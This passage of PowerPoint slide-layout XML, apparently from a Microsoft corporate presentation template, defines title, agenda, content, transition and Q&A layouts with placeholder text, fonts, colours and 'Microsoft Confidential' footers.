          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 6" descr="C:\Users\victor.melniciuc\Desktop\==Work\MCS BOM\ppt\JPEGs (ready)\MYM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="email"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6915761" y="6344457"/>
            <a:ext cx="1886441" cy="176104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9"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t="7401" r="30478"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4748405" y="1003300"/>
            <a:ext cx="4395595" cy="5854700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4743494" y="0"/>
            <a:ext cx="2858244" cy="3733800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">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p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1005278"/>
            <a:ext cx="9144000" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">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513292" y="1184665"/>
            <a:ext cx="7088445"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dirty="0"/>
              <a:t>Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="2130628"/>
            <a:ext cx="3887212"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5"/>
              </a:buBlip>
              <a:tabLst/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg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5"/>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5"/>
              </a:buBlip>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to insert text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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277482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Page (White)">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22"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a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="1384995"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="274320" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr sz="20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548640" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr sz="17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822960" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="14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097280" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="11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1371600" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="8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37394" y="3390900"/>
            <a:ext cx="1669215" cy="76200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4340744" y="6518080"/>
            <a:ext cx="462609" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{0462CC3E-48DD-4274-8616-D549FD7B2C15}" type="slidenum">
              <a:rPr lang="en-US" sz="1000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 2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30" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389436" y="360402"/>
            <a:ext cx="8363938" cy="509171"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3200" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style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t Page (Blue)">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-94" y="858"/>
            <a:ext cx="9144095" cy="6856285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4340744" y="6488700"/>
            <a:ext cx="462609" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{0462CC3E-48DD-4274-8616-D549FD7B2C15}" type="slidenum">
              <a:rPr lang="en-US" sz="1000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A4D7F4"/>
                </a:solidFill>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A4D7F4"/>
              </a:solidFill>
              <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648742" y="1463040"/>
            <a:ext cx="7924800" cy="1384995"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="274320" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg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3"/>
              </a:buBlip>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="822960" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1097280" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1371600" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="14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19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7336427" y="133321"/>
            <a:ext cx="1502362" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Microsoft Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 1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
        <p:nvSpPr>
          <p:cNvPr id="22" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389436" y="360402"/>
            <a:ext cx="8363938" cy="509171"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3200" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="628650" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="A4D7F4"/>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26017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Content Page (Blue_Empty)">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-94" y="858"/>
            <a:ext cx="9144095" cy="6856285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4340744" y="6488700"/>
            <a:ext cx="462609" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{0462CC3E-48DD-4274-8616-D549FD7B2C15}" type="slidenum">
              <a:rPr lang="en-US" sz="1000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A4D7F4"/>
                </a:solidFill>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A4D7F4"/>
              </a:solidFill>
              <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7336427" y="133321"/>
            <a:ext cx="1502362" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Microsoft Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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
        <p:nvSpPr>
          <p:cNvPr id="18" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389436" y="360402"/>
            <a:ext cx="8363938" cy="509171"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3200" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="628650" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="A4D7F4"/>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370442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defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198021" y="6495393"/>
            <a:ext cx="1001877" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Slide</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="511545" y="1010187"/>
            <a:ext cx="7924800" cy="1154162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="274320" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="bg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2"/>
              </a:buBlip>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="822960" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1097280" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1371600" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="9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094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Transition Slide (Option 2)">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192" y="1715"/>
            <a:ext cx="9141808" cy="6856285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1922728"/>
            <a:ext cx="9144000" cy="2897925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">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1" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="4345164"/>
            <a:ext cx="9144000" cy="475488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0A2E6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
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="2627981"/>
            <a:ext cx="8085015"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dirty="0"/>
              <a:t>Click to Edit Transition Slide Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513292" y="3326441"/>
            <a:ext cx="8085015"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Transition subtitle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297078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59FDB1C4-1BAF-460F-8361-CB4FBEAC1087}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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B25136CE-EE85-4FE3-9E4A-262CAB4753F1}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9510607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Q&amp;A Option 1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 2" descr="C:\Users\v-ameshm\Desktop\ladywritingtext.jpg"/>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1" y="-604"/>
            <a:ext cx="9175805" cy="685860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 y="4097868"/>
            <a:ext cx="9175805"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7" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
